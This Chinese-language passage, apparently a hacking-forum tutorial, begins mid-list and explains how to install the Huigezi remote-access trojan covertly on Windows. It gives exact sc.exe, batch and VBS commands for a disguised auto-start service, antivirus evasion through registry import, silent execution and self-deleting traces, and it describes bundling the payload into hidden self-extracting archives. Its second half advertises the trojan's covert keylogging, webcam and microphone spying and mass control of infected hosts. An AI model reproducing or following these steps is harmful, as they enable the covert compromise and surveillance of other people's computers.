2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BA T文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
里面写上如下代码:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。
八仙过海....7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"灰鸽子第一章:软件相关介绍:灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
11.软件附带有四款实用工具:a. EXE工具: 可以修改任何EXE文件图标,支持真彩色!b. 内网端口映射器:它允许你将局域网内的服务映射到internet上,使你在局域网内部也能使用自动上线功能!c. FTP服务器: 可以开本机FTP服务!d. Web服务器:可以建立一个简单的Web服务器!12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切!功能简单介绍:【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!【5】telnet(超级终端).【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线!【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!注册灰鸽子软件后享有:⒈享用软件的所有功能,没有任何限制!⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本!⒊可以使用我们的专用上线系统,无需其它域名和空间支持!⒋得到我们更好的技术服务!注:[VIP版] 包括VIP2005、V ersion 1.2、V ersion 2.0 ![企业版]用户只能使用企业版!不能使用其它版本!5.加入会员后,会自动加入官方论坛。